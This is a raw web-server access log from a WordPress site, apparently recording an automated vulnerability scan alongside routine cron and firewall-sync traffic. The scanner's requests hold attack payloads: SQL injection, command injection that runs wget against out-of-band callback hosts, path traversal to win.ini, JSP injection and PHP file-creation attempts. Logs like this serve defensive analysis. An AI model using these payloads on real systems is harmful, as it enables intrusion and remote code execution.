165.232.54.158 - - [13/Jan/2026:21:09:23 +0800] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
103.4.122.14 - - [13/Jan/2026:21:09:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768309772.4120039939880371093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:09:29 +0800] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 10857 "-" "Nacos-Server"
103.4.122.14 - - [13/Jan/2026:21:11:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768309910.9547610282897949218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:11:47 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:11:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768309916.2953209877014160156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:11:53 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:12:11 +0800] "POST /goform/setmac HTTP/1.1" 404 10862 "https://nutritaste.com.au/index.htmlr" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:21:12:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768309934.2208249568939208984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:12:41 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:21:13:04 +0800] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:21:13:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768309991.0345969200134277343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:13:09 +0800] "POST /?wordfence_syncAttackData=1768309989.473 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:13:07 +0800] "GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:13:13 +0800] "POST / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:21:13:29 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:14:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768310082.7573459148406982421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:14:39 +0800] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 404 10867 "https://nutritaste.com.au" "asusrouter--"
103.4.122.14 - - [13/Jan/2026:21:15:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768310144.6112389564514160156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:15:41 +0800] "GET /search.php?search=%22;wget+http%3A%2F%2Fd5iu610i9qj8svou82p06aq5shp7yobfi.oast.fun%27;%22 HTTP/1.1" 404 10923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
103.4.122.14 - - [13/Jan/2026:21:17:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768310270.6968729496002197265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:17:47 +0800] "GET /backend/backend/auth/restore HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:18:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768310291.1834490299224853515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:18:08 +0800] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=38BtjwwN9P9qyH4Uu2uprWgKCwr.php&target=l1_Lw HTTP/1.1" 301 - "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/121.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:18:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768310327.8214030265808105468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:18:44 +0800] "GET /status.htm HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:19:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768310342.7442910671234130859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:18:59 +0800] "POST /RPC2_Login HTTP/1.1" 404 10867 "https://nutritaste.com.au" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:21:19:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768310367.6730179786682128906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:19:24 +0800] "GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d5iu610i9qj8svou82p0rxgocqp158k7w.oast.fun)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1" 301 - "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [13/Jan/2026:21:19:26 +0800] "POST /RPC2_Login HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/115.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:21:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768310462.6904430389404296875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:20:59 +0800] "POST /tc.CBS.Appl/tcspseudo HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:21:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768310462.6911120414733886718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:20:59 +0800] "GET /ecp/38Btk6gqGdyv6ypBOxSkAVshiQP@ooQbA.com/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30"
165.232.54.158 - - [13/Jan/2026:21:24:59 +0800] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:21:25:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768310724.2184948921203613281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:25:22 +0800] "POST /?wordfence_syncAttackData=1768310722.612 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:25:20 +0800] "POST /goform/formWsc HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:26:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768310768.7024619579315185546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:26:05 +0800] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 10875 "https://nutritaste.com.au" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:21:26:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768310772.3391790390014648437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:26:09 +0800] "GET /?action=command&command=set_city_timezone&value=$(wget%20http://d5iu610i9qj8svou82p0zgxycwehmu4rn.oast.fun)) HTTP/1.1" 200 10784 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:26:12 +0800] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:27:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768310846.7878160476684570312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:27:23 +0800] "GET /document?__report=test.rptdesign&sample=%3C%25out.println(%22vvbdUahQvdWy2YUlrNh2%22)%3B%25%3E&__document=./test/DseJbAcyLWavLL0LagF9.jsp/. HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:21:27:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768310853.5040810108184814453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:27:30 +0800] "GET /test/DseJbAcyLWavLL0LagF9.jsp HTTP/1.1" 404 10877 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/125.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:28:27 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:28:31 +0800] "GET /wp-content/uploads/pp-files/aamdm.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:29:00 +0800] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:29:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768310948.1851480007171630859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:29:06 +0800] "POST /?wordfence_syncAttackData=1768310946.5869 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:29:04 +0800] "GET /38Btk2K0be2GBJ8Hx8OBBtsd9fl.php HTTP/1.1" 404 10886 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:29:40 +0800] "POST /http/index.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:29:41 +0800] "POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
103.4.122.14 - - [13/Jan/2026:21:29:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768310987.1513969898223876953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:29:45 +0800] "POST /?wordfence_syncAttackData=1768310985.5968 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:29:43 +0800] "POST /cgi/networkDiag.cgi HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/123.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:30:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768311008.1562540531158447265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:30:03 +0800] "POST /http/index.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:31:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768311069.0260000228881835937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:05 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [13/Jan/2026:21:31:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768311075.6333339214324951171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:12 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:31:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768311082.6168849468231201171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:19 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:31:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768311089.2163610458374023437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:26 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:31:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768311095.1686229705810546875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:32 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:31:38 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:31:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768311101.6369268894195556640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:31:40 +0800] "POST /?wordfence_syncAttackData=1768311100.1958 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:38 +0800] "POST /_ignition/execute-solution HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:31:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768311105.8455059528350830078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:31:42 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:31:49 +0800] "GET /wp-admin/ HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:32:12 +0800] "GET /dashboardUser HTTP/1.1" 503 7111 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:32:12 +0800] "GET /api/v3/J80lNt7O/../announcements HTTP/1.1" 503 7111 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:21:33:36 +0800] "PUT /SDK/webLanguage HTTP/1.1" 503 7111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0"
165.232.54.158 - - [13/Jan/2026:21:33:41 +0800] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:33:41 +0800] "GET /x HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:21:33:45 +0800] "GET /38Btk6N5NoHnCb8XEJBOMcmxiz1.php' HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:34:29 +0800] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
165.232.54.158 - - [13/Jan/2026:21:34:34 +0800] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:21:36:10 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 503 7313 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:36:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768311374.7702178955078125000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:36:12 +0800] "POST /?wordfence_syncAttackData=1768311372.7199 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:36:17 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:21:36:19 +0800] "POST /home/download HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
165.232.54.158 - - [13/Jan/2026:21:36:22 +0800] "GET /account/edit-profile/ HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1"
51.81.208.145 - - [13/Jan/2026:21:37:08 +0800] "POST /wp-login.php HTTP/1.1" 503 7313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
103.4.122.14 - - [13/Jan/2026:21:37:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768311433.6734509468078613281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:37:11 +0800] "POST /?wordfence_syncAttackData=1768311431.1537 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:40:18 +0800] "GET /login/ HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:40:32 +0800] "POST /wsman HTTP/1.1" 503 7113 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:21:40:39 +0800] "POST / HTTP/1.1" 503 7111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10"
165.232.54.158 - - [13/Jan/2026:21:40:53 +0800] "POST / HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [13/Jan/2026:21:40:55 +0800] "POST / HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:21:41:02 +0800] "POST /tryLogin.cgi HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:21:41:07 +0800] "POST /checkLogin.cgi HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:21:41:12 +0800] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
165.232.54.158 - - [13/Jan/2026:21:41:17 +0800] "POST /controller/login.php?acao=autenticar HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:41:22 +0800] "POST /controller/login.php?acao=autenticar HTTP/1.1" 503 7112 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [13/Jan/2026:21:43:03 +0800] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:43:01 +0800] "OPTIONS /wp-json/omapp/v1/support HTTP/1.1" 404 117 "https://wp.app.optinmonster.test" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:43:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768311785.6917788982391357421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:43:03 +0800] "POST /?wordfence_syncAttackData=1768311783.835 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:43:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768311828.8193109035491943359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:43:45 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
103.4.122.14 - - [13/Jan/2026:21:47:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768312054.7315130233764648437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:47:31 +0800] "POST /getcfg.php HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:21:47:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768312058.8822920322418212890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:47:37 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:48:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768312127.6758489608764648437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:48:44 +0800] "POST /cobbler_api HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:51:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768312261.8101780414581298828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:50:58 +0800] "GET /geoserver/ HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14"
103.4.122.14 - - [13/Jan/2026:21:51:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768312295.5937039852142333984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:51:32 +0800] "GET /about/../tree?action=get HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1"
